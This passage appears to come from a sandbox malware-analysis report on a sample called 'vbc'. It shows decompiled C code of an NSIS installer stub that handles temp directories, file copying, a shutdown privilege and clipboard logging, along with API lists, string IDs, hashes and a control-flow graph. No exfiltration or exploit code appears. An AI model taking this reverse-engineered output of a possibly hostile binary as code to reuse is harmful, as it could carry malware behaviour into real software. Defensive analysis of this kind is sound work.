                                                													_t190 = E00405B08(__eflags);
                                                													lstrcatW(_t235, L"~nsu");
                                                													__eflags = _t190;
                                                													if(_t190 != 0) {
                                                														lstrcatW(_t235, "A");
                                                													}
                                                													lstrcatW(_t235, L".tmp");
                                                													_t138 = lstrcmpiW(_t235, 0x441800);
                                                													__eflags = _t138;
                                                													if(_t138 == 0) {
                                                														L67:
                                                														_t189 = 0;
                                                														__eflags = 0;
                                                														goto L68;
                                                													} else {
                                                														__eflags = _t190;
                                                														_push(_t235);
                                                														if(_t190 == 0) {
                                                															E00405AEB();
                                                														} else {
                                                															E00405A6E();
                                                														}
                                                														SetCurrentDirectoryW(_t235);
                                                														__eflags =  *0x440800;
                                                														if( *0x440800 == 0) {
                                                															E0040653D(0x440800, 0x441800);
                                                														}
                                                														E0040653D(0x436000, _v16);
                                                														_t202 = "A" & 0x0000ffff;
                                                														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                														__eflags = _t144;
                                                														_v12 = 0x1a;
                                                														 *0x436800 = _t144;
                                                														do {
                                                															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                															DeleteFileW(0x42aa28);
                                                															__eflags = _v8;
                                                															if(_v8 != 0) {
                                                																_t149 = CopyFileW(0x443800, 0x42aa28, 1);
                                                																__eflags = _t149;
                                                																if(_t149 != 0) {
                                                																	E004062FD(_t202, 0x42aa28, 0);
                                                																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                																	_t153 = E00405B20(0x42aa28);
                                                																	__eflags = _t153;
                                                																	if(_t153 != 0) {
                                                																		CloseHandle(_t153);
                                                																		_v8 = 0;
                                                																	}
                                                																}
                                                															}
                                                															 *0x436800 =  *0x436800 + 1;
                                                															_t61 =  &_v12;
                                                															 *_t61 = _v12 - 1;
                                                															__eflags =  *_t61;
                                                														} while ( *_t61 != 0);
                                                														E004062FD(_t202, _t235, 0);
                                                														goto L67;
                                                													}
                                                												}
                                                												 *_t219 = _t189;
                                                												_t222 =  &(_t219[2]);
                                                												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                												_t265 = _t158;
                                                												if(_t158 == 0) {
                                                													goto L68;
                                                												}
                                                												E0040653D(0x440800, _t222);
                                                												E0040653D(0x441000, _t222);
                                                												_v8 = _t189;
                                                												goto L51;
                                                											}
                                                											asm("cdq");
                                                											asm("cdq");
                                                											asm("cdq");
                                                											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                												_t219 = _t219;
                                                												if(_t219 >= 0x440000) {
                                                													continue;
                                                												}
                                                												break;
                                                											}
                                                											_t189 = 0;
                                                											goto L48;
                                                										}
                                                										GetWindowsDirectoryW(_t235, 0x3fb);
                                                										lstrcatW(_t235, L"\\Temp");
                                                										_t171 = E004034FC(_t199, _t253);
                                                										_t254 = _t171;
                                                										if(_t171 != 0) {
                                                											goto L40;
                                                										}
                                                										GetTempPathW(0x3fc, _t235);
                                                										lstrcatW(_t235, L"Low");
                                                										SetEnvironmentVariableW(L"TEMP", _t235);
                                                										SetEnvironmentVariableW(L"TMP", _t235);
                                                										_t176 = E004034FC(_t199, _t254);
                                                										_t255 = _t176;
                                                										if(_t176 == 0) {
                                                											goto L68;
                                                										}
                                                										goto L40;
                                                									}
                                                									goto L31;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                									goto L29;
                                                								}
                                                								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                								__eflags = _t178 - 0x20;
                                                								if(_t178 == 0x20) {
                                                									L28:
                                                									_t36 =  &_v20;
                                                									 *_t36 = _v20 | 0x00000004;
                                                									__eflags =  *_t36;
                                                									goto L29;
                                                								}
                                                								__eflags = _t178 - _t189;
                                                								if(_t178 != _t189) {
                                                									goto L29;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                							__eflags = _t179 - _t210;
                                                							if(_t179 == _t210) {
                                                								L23:
                                                								 *0x434fa0 = 1;
                                                								goto L24;
                                                							}
                                                							__eflags = _t179 - _t189;
                                                							if(_t179 != _t189) {
                                                								goto L24;
                                                							}
                                                							goto L23;
                                                						}
                                                					} else {
                                                						goto L16;
                                                					}
                                                					do {
                                                						L16:
                                                						_t199 = _t199 + 2;
                                                						__eflags =  *_t199 - _t210;
                                                					} while ( *_t199 == _t210);
                                                					goto L17;
                                                				}
                                                				goto L37;
                                                			}















































                                                0x0040353b
                                                0x0040353c
                                                0x00403543
                                                0x00403546
                                                0x0040354d
                                                0x00403550
                                                0x00403563
                                                0x00403569
                                                0x0040356c
                                                0x0040356f
                                                0x0040357d
                                                0x00403585
                                                0x00403590
                                                0x004035a9
                                                0x004035ab
                                                0x004035b3
                                                0x004035b3
                                                0x004035be
                                                0x004035c0
                                                0x004035c0
                                                0x004035d5
                                                0x004035fa
                                                0x00403608
                                                0x0040360b
                                                0x00403612
                                                0x00403619
                                                0x00403619
                                                0x00403612
                                                0x0040361b
                                                0x00403620
                                                0x00403621
                                                0x0040362d
                                                0x00403631
                                                0x00403638
                                                0x00403646
                                                0x0040364b
                                                0x00403652
                                                0x00403656
                                                0x0040365a
                                                0x0040365c
                                                0x0040365c
                                                0x0040365a
                                                0x00403663
                                                0x0040366a
                                                0x00403670
                                                0x00403688
                                                0x00403698
                                                0x004036aa
                                                0x004036b1
                                                0x004036b3
                                                0x004036b4
                                                0x004036c5
                                                0x004036c9
                                                0x004036c9
                                                0x004036dc
                                                0x004036de
                                                0x004037d8
                                                0x004037d8
                                                0x004037db
                                                0x004037de
                                                0x00000000
                                                0x00000000
                                                0x004036e8
                                                0x004036e9
                                                0x004036ec
                                                0x004036f5
                                                0x004036f5
                                                0x004036f8
                                                0x004036fb
                                                0x004036fe
                                                0x00403701
                                                0x00403701
                                                0x00403701
                                                0x00403702
                                                0x00403706
                                                0x004037c6
                                                0x004037cf
                                                0x004037d1
                                                0x004037d4
                                                0x004037d7
                                                0x004037d7
                                                0x004037d7
                                                0x00000000
                                                0x0040370c
                                                0x0040370d
                                                0x0040370e
                                                0x00403712
                                                0x0040372c
                                                0x00403733
                                                0x00403746
                                                0x00403747
                                                0x0040375c
                                                0x00403761
                                                0x00403763
                                                0x00403765
                                                0x00403781
                                                0x00403788
                                                0x0040379b
                                                0x0040379c
                                                0x004037b1
                                                0x004037b7
                                                0x004037b9
                                                0x004037bb
                                                0x004037c3
                                                0x004037c5
                                                0x00000000
                                                0x004037c5
                                                0x004037bf
                                                0x004037c1
                                                0x004037e6
                                                0x004037ea
                                                0x004037f3
                                                0x004037f8
                                                0x004037fe
                                                0x00403809
                                                0x0040380b
                                                0x00403810
                                                0x00403812
                                                0x0040386a
                                                0x0040386f
                                                0x00403878
                                                0x0040387f
                                                0x00403882
                                                0x00403a59
                                                0x00403a59
                                                0x00403a5e
                                                0x00403a67
                                                0x00403a84
                                                0x00403afc
                                                0x00403afc
                                                0x00403b04
                                                0x00403b06
                                                0x00403b06
                                                0x00403b0c
                                                0x00403b0c
                                                0x00403a9b
                                                0x00403aa7
                                                0x00403ab8
                                                0x00403abf
                                                0x00403ac6
                                                0x00403ac6
                                                0x00403ace
                                                0x00403ada
                                                0x00403ae8
                                                0x00403af3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403adc
                                                0x00403adc
                                                0x00403add
                                                0x00403adf
                                                0x00403ae0
                                                0x00403ae1
                                                0x00403ae6
                                                0x00403af5
                                                0x00403af7
                                                0x00000000
                                                0x00403af7
                                                0x00000000
                                                0x00403ae6
                                                0x00403ada
                                                0x00403a71
                                                0x00403a78
                                                0x00403a78
                                                0x0040388e
                                                0x00403935
                                                0x00403935
                                                0x00403941
                                                0x00000000
                                                0x00403941
                                                0x0040389f
                                                0x004038a7
                                                0x004038f9
                                                0x004038f9
                                                0x004038ff
                                                0x00403906
                                                0x00403954
                                                0x00403956
                                                0x0040395b
                                                0x0040395d
                                                0x00403965
                                                0x00403965
                                                0x00403970
                                                0x0040397c
                                                0x00403982
                                                0x00403984
                                                0x00403a57
                                                0x00403a57
                                                0x00403a57
                                                0x00000000
                                                0x0040398a
                                                0x0040398a
                                                0x0040398c
                                                0x0040398d
                                                0x00403996
                                                0x0040398f
                                                0x0040398f
                                                0x0040398f
                                                0x0040399c
                                                0x004039a4
                                                0x004039ab
                                                0x004039b3
                                                0x004039b3
                                                0x004039c0
                                                0x004039cc
                                                0x004039d6
                                                0x004039d6
                                                0x004039d8
                                                0x004039df
                                                0x004039e9
                                                0x004039f5
                                                0x004039fb
                                                0x00403a01
                                                0x00403a04
                                                0x00403a0e
                                                0x00403a14
                                                0x00403a16
                                                0x00403a1a
                                                0x00403a2b
                                                0x00403a31
                                                0x00403a36
                                                0x00403a38
                                                0x00403a3b
                                                0x00403a41
                                                0x00403a41
                                                0x00403a38
                                                0x00403a16
                                                0x00403a44
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a52
                                                0x00000000
                                                0x00403a52
                                                0x00403984
                                                0x00403908
                                                0x0040390b
                                                0x0040390f
                                                0x00403914
                                                0x00403916
                                                0x00000000
                                                0x00000000
                                                0x00403922
                                                0x0040392d
                                                0x00403932
                                                0x00000000
                                                0x00403932
                                                0x004038b0
                                                0x004038c8
                                                0x004038d9
                                                0x004038da
                                                0x004038de
                                                0x004038e0
                                                0x004038ee
                                                0x004038f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038f5
                                                0x004038f7
                                                0x00000000
                                                0x004038f7
                                                0x0040381a
                                                0x00403826
                                                0x0040382b
                                                0x00403830
                                                0x00403832
                                                0x00000000
                                                0x00000000
                                                0x0040383a
                                                0x00403842
                                                0x00403853
                                                0x0040385b
                                                0x0040385d
                                                0x00403862
                                                0x00403864
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403864
                                                0x00000000
                                                0x004037c1
                                                0x0040376a
                                                0x0040376c
                                                0x00000000
                                                0x00000000
                                                0x0040376e
                                                0x00403772
                                                0x00403776
                                                0x0040377d
                                                0x0040377d
                                                0x0040377d
                                                0x0040377d
                                                0x00000000
                                                0x0040377d
                                                0x00403778
                                                0x0040377b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040377b
                                                0x00403714
                                                0x00403718
                                                0x0040371b
                                                0x00403722
                                                0x00403722
                                                0x00000000
                                                0x00403722
                                                0x0040371d
                                                0x00403720
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403720
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036ee
                                                0x004036ee
                                                0x004036ef
                                                0x004036f0
                                                0x004036f0
                                                0x00000000
                                                0x004036ee
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                • CharNextW.USER32(00000000), ref: 004036D6
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403809
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                • lstrcatW.KERNEL32 ref: 00403826
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040383A
                                                • lstrcatW.KERNEL32 ref: 00403842
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                • lstrcatW.KERNEL32 ref: 00403956
                                                • lstrcatW.KERNEL32 ref: 00403965
                                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                • lstrcatW.KERNEL32 ref: 00403970
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                                                • CloseHandle.KERNEL32(00000000), ref: 00403A3B
                                                • OleUninitialize.OLE32 ref: 00403A5E
                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3859024572-2607992671
                                                • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 168 4057e4-4057e7 145->168 169 4057c8-4057e2 SendMessageW * 2 145->169 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 154 4058f0-4058f6 150->154 155 405944-405948 150->155 152 4058d0-4058df ShowWindow * 2 call 4044ce 151->152 153 405909-405912 call 404500 151->153 152->150 165 405917-40591b 153->165 158 4058f8-405904 call 404472 154->158 159 40591e-40592e ShowWindow 154->159 155->153 162 40594a-405950 155->162 158->153 166 405930-405939 call 40559f 159->166 167 40593e-40593f call 404472 159->167 162->153 163 405952-405965 SendMessageW 162->163 170 405a67-405a69 163->170 171 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 163->171 166->167 167->155 172 4057f7-40580e call 404499 168->172 173 4057e9-4057f5 SendMessageW 168->173 169->168 170->165 180 405998-4059a8 GetWindowRect 171->180 181 4059ab-4059c0 TrackPopupMenu 171->181 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 180->181 181->170 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->170 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->170 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->170
                                                C-Code - Quality: 95%
                                                			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t94;
                                                				long _t95;
                                                				int _t100;
                                                				void* _t108;
                                                				intOrPtr _t119;
                                                				void* _t127;
                                                				intOrPtr _t130;
                                                				struct HWND__* _t134;
                                                				int _t156;
                                                				int _t159;
                                                				struct HMENU__* _t164;
                                                				struct HWND__* _t168;
                                                				struct HWND__* _t169;
                                                				int _t171;
                                                				void* _t172;
                                                				short* _t173;
                                                				short* _t175;
                                                				int _t177;
                                                
                                                				_t169 =  *0x433ee4;
                                                				_t156 = 0;
                                                				_v8 = _t169;
                                                				if(_a8 != 0x110) {
                                                					if(_a8 == 0x405) {
                                                						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                						CloseHandle(_t127); // executed
                                                					}
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						_t171 = 1;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t94 = _v8;
                                                							if(_a12 != _t94) {
                                                								goto L20;
                                                							}
                                                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                							_a8 = _t95;
                                                							if(_t95 <= _t156) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t164 = CreatePopupMenu();
                                                							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                							_t100 = _a16;
                                                							_t159 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v28);
                                                								_t100 = _v28.left;
                                                								_t159 = _v28.top;
                                                							}
                                                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                								_v60 = _t156;
                                                								_v48 = 0x42d268;
                                                								_v44 = 0x1000;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                								} while (_a4 != _t156);
                                                								OpenClipboard(_t156);
                                                								EmptyClipboard();
                                                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                								_a4 = _t108;
                                                								_t172 = GlobalLock(_t108);
                                                								do {
                                                									_v48 = _t172;
                                                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                									 *_t173 = 0xd;
                                                									_t175 = _t173 + 2;
                                                									 *_t175 = 0xa;
                                                									_t172 = _t175 + 2;
                                                									_t156 = _t156 + 1;
                                                								} while (_t156 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(0xd, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						if( *0x433ecc == _t156) {
                                                							ShowWindow( *0x434f08, 8);
                                                							if( *0x434f8c == _t156) {
                                                								_t119 =  *0x42c240; // 0x516114
                                                								_t57 = _t119 + 0x34; // 0xffffffd6
                                                								E0040559F( *_t57, _t156);
                                                							}
                                                							E00404472(_t171);
                                                							goto L25;
                                                						}
                                                						 *0x42ba38 = 2;
                                                						E00404472(0x78);
                                                						goto L20;
                                                					} else {
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E00404500(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x433ed0, _t156);
                                                						ShowWindow(_t169, 8);
                                                						E004044CE(_t169);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_t177 = 2;
                                                				_v60 = _t177;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t130 =  *0x434f10;
                                                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                				_t134 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x433ee4 = _t134;
                                                				_v8 = _t134;
                                                				E004044CE( *0x433ed0);
                                                				 *0x433ed4 = E00404E27(4);
                                                				 *0x433eec = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                				if(_a8 >= 0) {
                                                					SendMessageW(_v8, 0x1001, 0, _a8);
                                                					SendMessageW(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t156) {
                                                					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00404499(_a4);
                                                				if(( *0x434f18 & 0x00000003) != 0) {
                                                					ShowWindow( *0x433ed0, _t156);
                                                					if(( *0x434f18 & 0x00000002) != 0) {
                                                						 *0x433ed0 = _t156;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E004044CE( *0x433ec8);
                                                				}
                                                				_t168 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                				if(( *0x434f18 & 0x00000004) != 0) {
                                                					SendMessageW(_t168, 0x409, _t156, _a12);
                                                					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                				}
                                                				goto L36;
                                                			}



































                                                0x004056e6
                                                0x004056ec
                                                0x004056f6
                                                0x004056f9
                                                0x0040588f
                                                0x004058ac
                                                0x004058b3
                                                0x004058b3
                                                0x004058c6
                                                0x004058e4
                                                0x004058e6
                                                0x004058ee
                                                0x00405944
                                                0x00405948
                                                0x00000000
                                                0x00000000
                                                0x0040594a
                                                0x00405950
                                                0x00000000
                                                0x00000000
                                                0x0040595a
                                                0x00405962
                                                0x00405965
                                                0x00405a67
                                                0x00000000
                                                0x00405a67
                                                0x00405974
                                                0x0040597f
                                                0x00405988
                                                0x00405993
                                                0x00405996
                                                0x0040599f
                                                0x004059a5
                                                0x004059a8
                                                0x004059a8
                                                0x004059c0
                                                0x004059c9
                                                0x004059cc
                                                0x004059d3
                                                0x004059da
                                                0x004059e2
                                                0x004059e2
                                                0x004059f9
                                                0x004059f9
                                                0x00405a00
                                                0x00405a06
                                                0x00405a12
                                                0x00405a19
                                                0x00405a22
                                                0x00405a24
                                                0x00405a27
                                                0x00405a36
                                                0x00405a39
                                                0x00405a3f
                                                0x00405a40
                                                0x00405a46
                                                0x00405a47
                                                0x00405a48
                                                0x00405a50
                                                0x00405a5b
                                                0x00405a61
                                                0x00405a61
                                                0x00000000
                                                0x004059c0
                                                0x004058f6
                                                0x00405926
                                                0x0040592e
                                                0x00405930
                                                0x00405936
                                                0x00405939
                                                0x00405939
                                                0x0040593f
                                                0x00000000
                                                0x0040593f
                                                0x004058fa
                                                0x00405904
                                                0x00000000
                                                0x004058c8
                                                0x004058ce
                                                0x00405909
                                                0x00000000
                                                0x00405912
                                                0x004058d7
                                                0x004058dc
                                                0x004058df
                                                0x00000000
                                                0x004058df
                                                0x004058c6
                                                0x004056ff
                                                0x00405703
                                                0x0040570b
                                                0x0040570f
                                                0x00405712
                                                0x00405715
                                                0x00405718
                                                0x0040571b
                                                0x0040571c
                                                0x0040571d
                                                0x00405736
                                                0x00405739
                                                0x00405743
                                                0x00405752
                                                0x0040575a
                                                0x00405762
                                                0x00405767
                                                0x0040576a
                                                0x00405776
                                                0x0040577f
                                                0x00405788
                                                0x004057aa
                                                0x004057b0
                                                0x004057c1
                                                0x004057c6
                                                0x004057d4
                                                0x004057e2
                                                0x004057e2
                                                0x004057e7
                                                0x004057f5
                                                0x004057f5
                                                0x004057fa
                                                0x004057fd
                                                0x00405802
                                                0x0040580e
                                                0x00405817
                                                0x00405824
                                                0x00405833
                                                0x00405826
                                                0x0040582b
                                                0x0040582b
                                                0x0040583f
                                                0x0040583f
                                                0x00405853
                                                0x0040585c
                                                0x00405865
                                                0x00405875
                                                0x00405881
                                                0x00405881
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                • GetClientRect.USER32 ref: 00405788
                                                • GetSystemMetrics.USER32 ref: 0040578F
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                • ShowWindow.USER32(00000000,?), ref: 00405817
                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                • AppendMenuW.USER32 ref: 0040597F
                                                • GetWindowRect.USER32 ref: 0040599F
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                • EmptyClipboard.USER32 ref: 00405A06
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                • GlobalLock.KERNEL32 ref: 00405A1C
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                • SetClipboardData.USER32 ref: 00405A5B
                                                • CloseClipboard.USER32 ref: 00405A61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
